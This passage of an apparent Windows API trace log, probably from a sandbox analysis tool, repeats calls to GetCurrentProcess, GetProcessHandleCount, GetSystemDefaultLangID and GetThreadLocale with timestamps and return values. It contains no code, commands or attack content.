0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.595] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.595] GetSystemDefaultLangID () returned 0x26a0409 [0100.595] GetThreadLocale () returned 0x409 [0100.595] GetCurrentProcess () returned 0xffffffff [0100.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.596] GetSystemDefaultLangID () returned 0x26a0409 [0100.596] GetThreadLocale () returned 0x409 [0100.596] GetCurrentProcess () returned 0xffffffff [0100.596] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.597] GetSystemDefaultLangID () returned 0x26a0409 [0100.597] GetThreadLocale () returned 0x409 [0100.597] GetCurrentProcess () returned 0xffffffff [0100.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.597] GetSystemDefaultLangID () returned 0x26a0409 [0100.597] GetThreadLocale () returned 0x409 [0100.597] GetCurrentProcess () returned 0xffffffff [0100.597] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.598] GetCurrentProcess () returned 0xffffffff [0100.598] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.598] GetSystemDefaultLangID () returned 0x26a0409 [0100.598] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.599] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.599] GetSystemDefaultLangID () returned 0x26a0409 [0100.599] GetThreadLocale () returned 0x409 [0100.599] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.600] GetThreadLocale () returned 0x409 [0100.600] GetCurrentProcess () returned 0xffffffff [0100.600] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.600] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.601] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.601] GetSystemDefaultLangID () returned 0x26a0409 [0100.601] GetThreadLocale () returned 0x409 [0100.601] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.602] GetThreadLocale () returned 0x409 [0100.602] GetCurrentProcess () returned 0xffffffff [0100.602] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.602] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.603] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.603] GetSystemDefaultLangID () returned 0x26a0409 [0100.603] GetThreadLocale () returned 0x409 [0100.603] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.604] GetThreadLocale () returned 0x409 [0100.604] GetCurrentProcess () returned 0xffffffff [0100.604] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.604] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.605] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.605] GetSystemDefaultLangID () returned 0x26a0409 [0100.605] GetThreadLocale () returned 0x409 [0100.605] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.606] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.606] GetSystemDefaultLangID () returned 0x26a0409 [0100.606] GetThreadLocale () returned 0x409 [0100.606] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.607] GetCurrentProcess () returned 0xffffffff [0100.607] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.607] GetSystemDefaultLangID () returned 0x26a0409 [0100.607] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.608] GetThreadLocale () returned 0x409 [0100.608] GetCurrentProcess () returned 0xffffffff [0100.608] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.608] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.609] GetThreadLocale () returned 0x409 [0100.609] GetCurrentProcess () returned 0xffffffff [0100.609] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.609] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.610] GetSystemDefaultLangID () returned 0x26a0409 [0100.610] GetThreadLocale () returned 0x409 [0100.610] GetCurrentProcess () returned 0xffffffff [0100.610] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.611] GetThreadLocale () returned 0x409 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.611] GetThreadLocale () returned 0x409 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.611] GetThreadLocale () returned 0x409 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.611] GetThreadLocale () returned 0x409 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.611] GetThreadLocale () returned 0x409 [0100.611] GetCurrentProcess () returned 0xffffffff [0100.611] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.611] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.612] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.612] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.612] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.612] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.612] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.612] GetSystemDefaultLangID () returned 0x26a0409 [0100.612] GetThreadLocale () returned 0x409 [0100.612] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0100.613] GetSystemDefaultLangID () returned 0x26a0409 [0100.613] GetThreadLocale () returned 0x409 [0100.613] GetCurrentProcess () returned 0xffffffff [0100.613] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 